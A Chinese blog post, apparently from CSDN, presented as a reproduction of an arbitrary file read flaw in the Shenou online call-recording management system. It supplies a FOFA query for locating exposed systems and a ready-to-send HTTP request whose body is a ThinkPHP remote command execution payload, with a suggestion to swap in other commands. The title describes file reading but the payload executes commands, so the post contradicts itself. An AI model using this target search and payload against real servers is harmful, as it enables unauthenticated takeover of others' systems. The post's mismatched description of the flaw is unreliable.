【漏洞复现】申瓯通信在线录音管理系统downloa任意文件读取漏洞

最新推荐文章于 2024-08-02 16:22:25 发布
最新推荐文章于 2024-08-02 16:22:25 发布
阅读量383 收藏 8
点赞数 3
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a96482/article/details/140834504
版权

简介:

  申瓯通信在线录音管理系统 index.php接口处任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

搜索语法:

在fofa中使用。

title=在线录音管理系统

复现步骤:

打开一个网站

使用burpsuite抓包,修改包内容。

POST /callcenter/public/index.php/index.php?s=index/index/index HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Length: 62
 
s=id&_method=__construct&method=POST&filter[]=system

我们发现回显内容,通过修改变量,可以获得不同的回显内容比如"ls"。

一同吃泥
关注
  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
申瓯通信 在线录音管理系统 download 任意文件读取漏洞复现
0xSec
06-17 541
申瓯通信在线录音管理系统 download 接口处任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
申瓯通信在线录音管理系统任意文件读取漏洞复现
The current road is different, love needs to distinguish between right and wrong
06-26 188
申瓯通信设备有限公司在线录音管理系统 download 接口处任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件、数据库配置文件等等,导致网站处于极度不安全状态。没有人规定,一朵花一定要成长为向日葵或者玫瑰。
漏洞复现申瓯通信 在线录音管理系统 download 任意文件读取漏洞
siu~
06-18 301
申瓯通信在线录音管理系统 download 接口处任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
漏洞复现申瓯通信在线录音管理系统Thinkphp远程代码执行漏洞
siu~
06-22 559
申瓯通信在线录音管理系统存在Thinkphp远程代码执行漏洞,未经身份验证的远程攻击者可以利用此漏洞执行任意指令或写入webshell,导致服务器权限被控,造成严重威胁。
申瓯通信 在线录音管理系统 Thinkphp 远程代码执行漏洞复现
0xSec
06-21 656
申瓯通信 在线录音管理系统 存在Thinkphp 远程代码执行漏洞,未经身份验证的远程攻击者可以利用此漏洞执行任意指令或写入webshell,导致服务器权限被控,造成严重威胁。
0day 在线录音管理系统download任意文件下载漏洞和RCE命令执行漏洞
weixin_43167326的博客
06-12 798
在线录音管理系统是一种在线社区平台,旨在为用户提供一个共享知识、经验和想法的空间。社交圈子论坛系统除了提供基本的社交功能外,还可以根据用户行为和兴趣为用户推荐相关内容。
漏洞复现申瓯通信 在线录音管理系统 download 任意文件读取漏洞
qq_39894062的博客
06-26 475
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
漏洞复现申瓯通信 在线录音管理系统 Thinkphp 远程代码执行漏洞
qq_39894062的博客
06-23 848
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
漏洞复现申瓯通信在线录音管理系统(Thinkphp远程代码执行漏洞
qq_48368964的博客
07-31 218
申瓯通信在线录音管理系统是一款功能强大的录音管理解决方案,旨在满足公司、集团单位在区域分布下对录音数据的集中管理需求。该系统基于SOC1900、S0C1600等系列录音盒开发,是一个多线路、多设备、多区域的录音统一管理平台。该系统将各个分点的录音盒的录音统一集中到服务器,便于总部人员快速查看和管理,从而提升企事业单位的服务质量和管理效率。申瓯通信在线录音管理系统存在Thinkphp远程代码执行漏洞,未经身份验证的远程攻击者可以利用此漏洞执行任意指令或写入webshell,导致服务器权限被控,造成严重威胁。
申瓯HJK-120程控交换机管理系统
01-23
申瓯HJK-120程控交换机管理系统是一款专为申瓯HJK-120系列交换机设计的PC端管理软件,旨在提高通信设备的管理和调试效率,减少传统通过座机进行编程的繁琐步骤。该系统以其便捷的操作界面和强大的功能,为企业通信...
申瓯Soc3100电话交换机管理系统端控制软件.rar
09-05
早期WIN9X/XP系统上运行的管理系统,在WIN7上也能使用,支持综合监控与动态监控。功能包括以下设置项目:中继开关、计费方式、转接方式、发码方式、出局方式、中继方向、拆线方式、H信令、组号、板号是否转发、是否...
申瓯HJK-120(D)软件
04-29
申瓯HJK-120(D)软件是一款专为申瓯通信系统设计的应用程序,它主要用于管理和维护申瓯HJK-120(D)系列的通信设备。这款软件集成了丰富的功能,旨在提升通信系统的效率和稳定性,为用户提供便捷的操作体验。 首先,...
SOC1800电话录音系统用户手册范本.doc
09-25
用户需要登录 web 网管来管理录音,包括设置系统 IP 地址、管理员管理、系统信息、WEB IP 地址设置、设置 MAC 地址、恢复出厂设置、在线升级、设置系统实时时钟、权限管理和管理员管理等。 5. 录音管理 用户可以...
【Vulnhub系列】Vulnhub Connect-The-Dots 靶场渗透(原创)
最新发布
Lusen的博客
08-02 387
Vulnhub系列Connect-The-Dots靶场做题记录
linux操作系统_TCP
hkhkhkhkh123的博客
07-30 1060
1)三次握手和四次挥手机制 2) 确认应答:TCP将每个字节的数据都进行了编号,即为序列号。每一个ACK都带有对应的确认序列号,保证数据不丢失的按序到达 3)超时重传:当发送端发送的数据在网络中丢失时,在一定时间内没有收到接收端的ACK,则发送端会重新发送丢失数据。2. ACK: 确认应答标志 3. PSH: 表示发送数据,提示接收端从TCP接收缓冲区中读走数据,为接收后续数据腾出空间 4. RST: 重置连接标志 5. SYN: 表示请求建立一个连接 6. FIN: finish标志, 表示释放连接。
网络安全在2024好入行吗?
2401_84466225的博客
07-29 659
024年的今天,慎重进入网安行业吧,目前来说信息安全方向的就业对于学历的容忍度比软件开发要大得多,还有很多高中被挖过来的大佬。
保护国外使用代理IP的安全方法
iphttp的博客
07-30 422
用户在国外使用代理IP时,应该时刻保持警惕,不要随意点击可疑链接,养成良好的网络安全意识。此外,用户还应该避免在代理服务器上输入敏感信息,如银行账号、密码等。使用代理IP时,用户应该尽量使用加密协议(如SSL、TLS)来保护数据传输的安全。这将确保用户的个人信息和访问记录不会被黑客窃取或监控。在选择代理服务器时,用户应该选择那些经过验证和信任的服务器,如知名的VPN服务提供商。用户应该定期更新操作系统和软件,以确保其安全性。这样可以有效地防止黑客通过代理服务器攻击用户的计算机或移动设备。
申瓯SOC1800电话录音系统安装与Web管理指南
本资源是申瓯通信设备有限公司发布的"SOC1800电话录音系统用户手册",版本为UG-1800-V1.0,发行于2008年5月。该手册详细介绍了申瓯生产的电话录音系统的使用方法和安全注意事项,旨在帮助用户正确安装、配置和维护这...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值